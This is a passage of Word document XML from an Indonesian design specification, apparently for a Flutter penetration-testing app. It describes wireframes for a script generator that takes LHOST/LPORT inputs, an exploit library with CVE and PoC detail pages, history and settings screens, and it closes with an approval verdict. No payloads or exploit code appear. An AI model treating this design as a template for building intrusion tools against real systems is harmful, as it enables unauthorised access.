      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> adalah pemilik perangkat (single-user) dan data disimpan lokal/terenkripsi; backend tidak menyimpan riwayat.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6. Wireframe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireframe lengkap tersedia sebagai SVG di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/assets/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan dapat dibuka langsung di browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>6.1 Dashboard (ponsel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A4F8B"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Wireframe Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (assets/wireframe-dashboard.svg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Elemen: top bar (judul + riwayat/ekspor/tentang), kartu Studio, Nmap, Aktivitas, Library, Threat, Monitoring yang tersusun vertikal, FAB Info Bot, dan bottom navigation 5 item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>6.2 Script Generator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A4F8B"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Wireframe Generator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (assets/wireframe-generator.svg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Elemen: tab One-Liner/Python, chip kategori, dropdown tipe, input LHOST/LPORT, tombol Generate, blok kode dengan tombol salin, serta SnackBar konfirmasi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>6.3 Exploit Library dan detail (ponsel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A4F8B"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Wireframe Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (assets/wireframe-exploit.svg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Elemen: kolom pencarian, kartu exploit (CVE, kategori, layanan, ringkasan), dan halaman detail penuh berisi CVSS, deskripsi, PoC, serta tombol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Send to Studio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6.4 Riwayat Aktivitas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A4F8B"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Wireframe Riwayat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (assets/wireframe-history.svg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Elemen: app bar dengan muat ulang/hapus, daftar kartu (ikon jenis, judul, cuplikan, waktu), aksi geser untuk menghapus, dan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bottom sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> detail dengan tombol salin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>6.5 Settings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A4F8B"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Wireframe Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (assets/wireframe-settings.svg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Elemen: kartu API Configuration, Target Defaults (responsif dua kolom/satu kolom), LLM Engine, Theme &amp; UI Tweaks, dan tombol Save Settings.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7. Purwarupa Antarmuka</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purwarupa interaktif tersedia di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A4F8B"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>`docs/prototipe/index.html`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (prototipe/index.html)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>. Buka file tersebut di browser, lalu gunakan navigasi bawah untuk berpindah layar. Purwarupa menampilkan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Dashboard versi ponsel dengan kartu bertumpuk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Generator dengan validasi dan contoh keluaran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Riwayat dengan pencarian visual dan detail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>tap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit → detail → kembali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purwarupa ini bersifat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>high-fidelity untuk tata letak dan alur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; perilaku fungsional sesungguhnya diuji pada aplikasi Flutter (Tahap 3–4). Aplikasi Flutter juga dapat dijalankan sebagai purwarupa hidup melalui </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flutter run -d chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>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8. Kesesuaian Desain dengan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Karakteristik pengguna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Keputusan desain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Alasan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Bekerja cepat, satu tangan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Aksi utama di bawah, bottom nav, FAB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Jangkauan jempol pada ponsel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Terbiasa terminal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Blok kode monospace, tombol salin, output apa adanya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Mengurangi kesalahan transmisi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Lingkungan lab berkoneksi terbatas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one-liner offline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Tetap produktif tanpa backend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Concern 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Secure storage, API key disamarkan, peringatan etika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Mencegah kebocoran kredensial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Multi-perangkat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adaptif 1/3 kolom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Konsisten di ponsel, tablet, desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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9.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adaptif diterapkan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dashboard_screen.dart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app_sidebar.dart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detail exploit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exploit_library_page.dart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color w:val="9C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>_ExploitDetailScreen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Riwayat memakai </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Navigator.push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history_panel.dart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color w:val="9C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>openHistory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Model data sesuai kode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activity_entry.dart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backend/app/models.py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Purwarupa dan wireframe tersedia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docs/prototipe/index.html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docs/assets/*.svg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Pengukuran kontras formal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Nilai warna diambil dari tema; audit kontras otomatis belum dijalankan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VERDICT: approve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — rancangan alur, navigasi, data, dan antarmuka konsisten dengan kebutuhan Tahap 1 dan siap diimplementasikan.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